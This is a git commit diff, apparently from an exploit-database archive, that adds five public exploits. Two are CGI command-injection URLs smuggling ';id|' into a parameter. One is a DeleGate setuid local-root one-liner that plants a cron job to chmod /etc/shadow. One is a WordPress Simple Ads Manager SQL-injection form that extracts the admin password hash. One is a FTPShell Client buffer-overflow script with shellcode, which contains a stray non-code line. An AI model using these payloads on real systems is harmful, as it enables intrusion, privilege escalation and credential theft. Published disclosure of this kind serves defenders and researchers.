DB: 2015-12-31

5 new exploits
2015-12-31 05:02:01 +00:00 · 2015-12-31 05:02:01 +00:00 · ae8b3fb122
commit ae8b3fb122
parent 2f4bedf752
6 changed files with 349 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -35378,3 +35378,8 @@ id,file,description,date,author,platform,type,port
 39127,platforms/cgi/webapps/39127.txt,"innoEDIT 'innoedit.cgi' Remote Command Execution Vulnerability",2014-03-21,"Felipe Andrian Peixoto",cgi,webapps,0
 39128,platforms/php/webapps/39128.txt,"Jorjweb 'id' Parameter SQL Injection Vulnerability",2014-02-21,"Vulnerability Laboratory",php,webapps,0
 39129,platforms/php/webapps/39129.txt,"qEngine 'run' Parameter Local File Include Vulnerability",2014-03-25,"Gjoko Krstic",php,webapps,0
+39130,platforms/cgi/webapps/39130.txt,"DotItYourself 'dot-it-yourself.cgi' Remote Command Execution Vulnerability",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0
+39131,platforms/cgi/webapps/39131.txt,"Beheer Systeem 'pbs.cgi' Remote Command Execution Vulnerability",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0
+39132,platforms/windows/local/39132.py,"FTPShell Client 5.24 - Buffer Overflow",2015-12-30,hyp3rlinx,windows,local,0
+39133,platforms/php/webapps/39133.php,"Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",php,webapps,80
+39134,platforms/linux/local/39134.txt,"DeleGate 9.9.13 - Local Root Vulnerability",2015-12-30,"Larry W. Cashdollar",linux,local,0
--- a/platforms/cgi/webapps/39130.txt
+++ b/platforms/cgi/webapps/39130.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/66487/info
+
+DotItYourself is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.
+
+DotItYourself 6.11.060830 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cade/dot-it-yourself.cgi?download=;id| 
--- a/platforms/cgi/webapps/39131.txt
+++ b/platforms/cgi/webapps/39131.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/66489/info
+
+Beheer Systeem is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.
+
+Beheer Systeem 6.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/!/pbs.cgi?download=;id| 
--- a/platforms/linux/local/39134.txt
+++ b/platforms/linux/local/39134.txt
@ -0,0 +1,49 @@
+Title: Local root vulnerability in DeleGate v9.9.13
+Author: Larry W. Cashdollar, @_larry0
+Date: 2015-12-17
+Advisory: http://www.vapidlabs.com/advisory.php?v=159
+Download Sites: http://delegate.hpcc.jp/delegate/ 
+                              http://delegate.org/delegate/
+Vendor: National Institute of Advanced Industrial Science and Technology
+Vendor Notified: 2015-12-17
+Vendor Contact: y.sato@delegate.org ysato@etl.go.jp
+Description: DeleGate is a multipurpose proxy server which relays various application protocols on TCP/IP or UDP/IP, including HTTP, FTP, Telnet, NNTP, SMTP, POP, IMAP, LPR, LDAP, ICP, DNS, SSL, Socks, and more. DeleGate mediates communication between servers and clients where direct communication is impossible, inefficient, or inconvenient.
+
+Vulnerability:
+Installation of delegate 9.9.13 sets some binaries setuid root, at least one of these binaries can be used to escalate the privileges of a local user.  The binary dgcpnod creates a node allowing a local unprivileged user to create files anywhere on disk.   By creating a file in /etc/cron.hourly a local user can execute commands as root.
+
+Installation of software via source or binary distribution with option to not run as root results in a script set-subin.sh to run setting the setuid bit on four binaries.  In Linux distributions where this software is part of the package list these binaries are not setuid root. (archlinux)
+
+From documentation http://www.delegate.org/delegate/newbies-ja.shtml (translated to english):
+Go is included in the binary distribution, or DGROOT that you can build from the source to the location of preference, and then change the name if necessary. This is the DgRoot. In addition, if needed, you can rename the executable file of DeleGate to the name of the preference. This is the DgExe.
+"In Unix version subin in if you want to use "(such as when using a privileged port), do the following.
+
+  (3-2uk) $ cd DgRoot / subin
+          $ Sh setup-subin.sh
+
+larry@f4ult:~/dg9_9_13/DGROOT/subin$ ls -l
+total 1916
+-r-sr-s--- 1 root  larry 384114 Oct 31  2014 dgbind
+-r-sr-s--- 1 root  larry 384598 Oct 31  2014 dgchroot
+-r-sr-s--- 1 root  larry 384161 Oct 31  2014 dgcpnod
+-rwxr-xr-x 1 larry larry 384114 Oct 31  2014 dgdate
+-rwxr-xr-x 1 larry larry  29066 Oct 31  2014 dgforkpty
+-r-sr-s--- 1 root  larry 384113 Oct 31  2014 dgpam
+-rwxr-x--- 1 larry larry    272 Oct 27  2014 setup-subin.sh
+
+This script sets the setuid bit on four binaries:
+
+larry@f4ult:~/dg9_9_13/DGROOT/subin$ cat setup-subin.sh
+#!/bin/sh
+
+SUBINS="dgpam dgbind dgchroot dgcpnod"
+sudo sh -c "chown root $SUBINS; chmod 6550 $SUBINS"
+if [ $? != 0 ]; then
+  su root -c "chown root $SUBINS; chmod 6550 $SUBINS"
+fi
+
+CVEID: 2015-7556
+
+
+Exploit Code:
+$ touch /tmp/rootme; chmod +x /tmp/rootme; ./dgcpnod /tmp/rootme /etc/cron.hourly/rootme; echo -e '#!/bin/bash \n chmod 777 /etc/shadow' > /etc/cron.hourly/rootme 
--- a/platforms/php/webapps/39133.php
+++ b/platforms/php/webapps/39133.php
@ -0,0 +1,101 @@
+/*
+# Exploit Title: Simple Ads Manager 2.9.4.116 SQL Injection
+# Date: 30-12-2015
+# Software Link: https://wordpress.org/plugins/simple-ads-manager/
+# Exploit Author: Kacper Szurek
+# Contact: http://twitter.com/KacperSzurek
+# Website: http://security.szurek.pl/
+# Category: webapps
+ 
+1. Description
+
+$whereClause and $whereClauseT and $whereClauseW and $whereClause2W are not escaped.
+
+File: simple-ads-manager\ad.class.php
+
+$aSql = "
+	(SELECT
+	  @pid := sp.id AS pid,
+	  0 AS aid,
+	  sp.name,
+	  sp.patch_source AS code_mode,
+	  @code_before := sp.code_before AS code_before,
+	  @code_after := sp.code_after AS code_after,
+	  @ad_size := IF(sp.place_size = \"custom\", CONCAT(CAST(sp.place_custom_width AS CHAR), \"x\", CAST(sp.place_custom_height AS CHAR)), sp.place_size) AS ad_size,
+	  sp.patch_code AS ad_code,
+	  sp.patch_img AS ad_img,
+	  \"\" AS ad_alt,
+	  0 AS ad_no,
+	  sp.patch_link AS ad_target,
+	  0 AS ad_swf,
+	  \"\" AS ad_swf_flashvars,
+	  \"\" AS ad_swf_params,
+	  \"\" AS ad_swf_attributes,
+	  \"\" AS ad_swf_fallback,
+	  sp.patch_adserver AS ad_adserver,
+	  sp.patch_dfp AS ad_dfp,
+	  0 AS count_clicks,
+	  0 AS code_type,
+	  IF((sp.patch_source = 1 AND sp.patch_adserver) OR sp.patch_source = 2, -1, 1) AS ad_cycle,
+	  @aca := IFNULL((SELECT AVG(sa.ad_weight_hits*10/(sa.ad_weight*$cycle)) FROM $aTable sa WHERE sa.pid = @pid AND sa.trash IS NOT TRUE AND {$whereClause} {$whereClauseT} {$whereClause2W}), 0) AS aca
+	FROM {$pTable} sp
+	WHERE {$pId} AND sp.trash IS FALSE)
+	UNION
+	(SELECT
+	  sa.pid,
+	  sa.id AS aid,
+	  sa.name,
+	  sa.code_mode,
+	  @code_before AS code_before,
+	  @code_after AS code_after,
+	  @ad_size AS ad_size,
+	  sa.ad_code,
+	  sa.ad_img,
+	  sa.ad_alt,
+	  sa.ad_no,
+	  sa.ad_target,
+	  sa.ad_swf,
+	  sa.ad_swf_flashvars,
+	  sa.ad_swf_params,
+	  sa.ad_swf_attributes,
+	  sa.ad_swf_fallback,
+	  0 AS ad_adserver,
+	  0 AS ad_dfp,
+	  sa.count_clicks,
+	  sa.code_type,
+	  IF(sa.ad_weight, (sa.ad_weight_hits*10/(sa.ad_weight*$cycle)), 0) AS ad_cycle,
+	  @aca AS aca
+	FROM {$aTable} sa
+	WHERE sa.pid = @pid AND sa.trash IS FALSE AND {$whereClause} {$whereClauseT} {$whereClauseW})
+	ORDER BY ad_cycle
+	LIMIT 1;";
+
+http://security.szurek.pl/simple-ads-manager-294116-sql-injection.html
+
+2. Proof of Concept
+*/
+
+<?php
+$out = array();
+$out['WC'] = '1=0';
+$out['WCT'] = '';
+$out['WCW'] = ') UNION (SELECT user_pass, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2 FROM wp_users WHERE ID = 1';
+$out['WC2W'] = '';
+?>
+<form method="post" action="http://wp-url/wp-content/plugins/simple-ads-manager/sam-ajax-loader.php">
+<input type="hidden" name="action" value="load_place">
+<input type="hidden" name="id" value="0">
+<input type="hidden" name="pid" value="1">
+<input type="text" name="wc" value="<?php echo base64_encode(serialize($out)); ?>">
+<input type="submit" value="Send">
+</form>
+
+/*
+Administrator password will be here:
+
+{"success":true,"ad":"<div id='c2077_1_%here_is_password%' class='sam-container sam-place' data-sam='0'><\/div>","id":"1","pid":"%here_is_password%","cid":"c2077_1_%here_is_password%"}
+
+3. Solution:
+   
+Update to version 2.9.5.118
+*/
--- a/platforms/windows/local/39132.py
+++ b/platforms/windows/local/39132.py
@ -0,0 +1,176 @@
+'''
+[+] Credits: hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source:
+http://hyp3rlinx.altervista.org/advisories/FTPSHELL-v5.24-BUFFER-OVERFLOW.txt
+
+
+Vendor:
+================================
+www.ftpshell.com
+
+
+Product:
+================================
+FTPShell Client version 5.24
+
+FTPShell client is a windows file transfer program that enables users to
+reliably transfer files,
+upload to websites, and download updates from the internet.
+
+
+Vulnerability Type:
+===================
+Buffer Overflow
+
+
+CVE Reference:
+==============
+N/A
+
+
+Vulnerability Details:
+=====================
+ftpshell.exe client has a buffer overflow entry point in the 'Address'
+input field used to connect to an FTP server.
+Allowing local arbitrary code execution by overwriting several registers on
+the stack and controlling program execution flow.
+EIP register will be used to jump to our malicious shellcode which will be
+patiently waiting in ECX register.
+
+exploited registers dump...
+
+EAX 00000021
+ECX 0012E5B0
+EDX 76F670B4 ntdll.KiFastSystemCallRet
+EBX 76244FC4 kernel32.76244FC4
+ESP 0012E658 ASCII "calc.exe"   <--------- BAM!
+EBP 7621E5FD kernel32.WinExec
+ESI 001D2930
+EDI 76244FEC kernel32.76244FEC
+EIP 015FB945
+C 0  ES 0023 32bit 0(FFFFFFFF)
+P 1  CS 001B 32bit 0(FFFFFFFF)
+A 0  SS 0023 32bit 0(FFFFFFFF)
+Z 1  DS 0023 32bit 0(FFFFFFFF)
+S 0  FS 003B 32bit 7FFDE000(FFF)
+T 0  GS 0000 NULL
+D 0
+O 0  LastErr ERROR_SUCCESS (00000000)
+EFL 00200246 (NO,NB,E,BE,NS,PE,GE,LE)
+ST0 empty g
+ST1 empty g
+ST2 empty g
+ST3 empty g
+ST4 empty g
+ST5 empty g
+ST6 empty g
+ST7 empty g
+               3 2 1 0      E S P U O Z D I
+FST C5E1  Cond 1 1 0 1  Err 1 1 1 0 0 0 0 1  (Unordered)
+FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0
+
+
+test stack dump....
+
+(3b8.fa0): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** WARNING: Unable to verify checksum for ftpshell.exe
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
+ftpshell.exe -
+eax=41414141 ebx=017ebc70 ecx=017ebc70 edx=0012ebc8 esi=0012ebc8
+edi=017a9498
+eip=41414141 esp=0012e928 ebp=0012ea70 iopl=0         nv up ei pl nz na po
+nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
+efl=00210202
+41414141 ??              ???
+
+
+Exploit code(s):
+===============
+'''
+
+import struct
+
+#FTPShell Client version 5.24 - www.ftpshell.com
+#Buffer Overflow Exploit
+#by hyp3rlinx
+#run to generate payload, then copy and inject
+#into the 'Address' field on the client and BOOM!
+
+#shellcode to pop calc.exe Windows 7 SP1
+sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
+"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
+"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
+"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
+"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
+"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
+"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
+
+
+#payload="A"*2475+"R"*4+"\xcc"*100  #<---- control EIP register
+
+#find appropriate assembly instruction to call our payload JMP or CALL ECX.
+#!mona jmp -r ecx -m kernel32.dll
+
+eip=struct.pack('<L', 0x761C1FDC)    #jmp ecx kernel32.dll
+payload="A"*2475+eip+sc              #<----- direct EIP overwrite no NOPs
+no nothing... BOOOOOM!!!
+
+file=open("C:\\ftpshell-exploit","w")
+file.write(payload)
+file.close()
+
+
+'''
+Disclosure Timeline:
+========================================
+Vendor Notification:  NR
+December 29, 2015  : Public Disclosure
+
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+
+Severity Level:
+================
+High
+
+
+
+Description:
+==========================================================
+
+
+Request Method(s):              [+]  Local Injection
+
+
+Vulnerable Product:             [+]  FTPShell Client version 5.24
+
+
+Vulnerable Parameter(s):        [+] 'Address'
+
+
+
+===========================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+by hyp3rlinx
+'''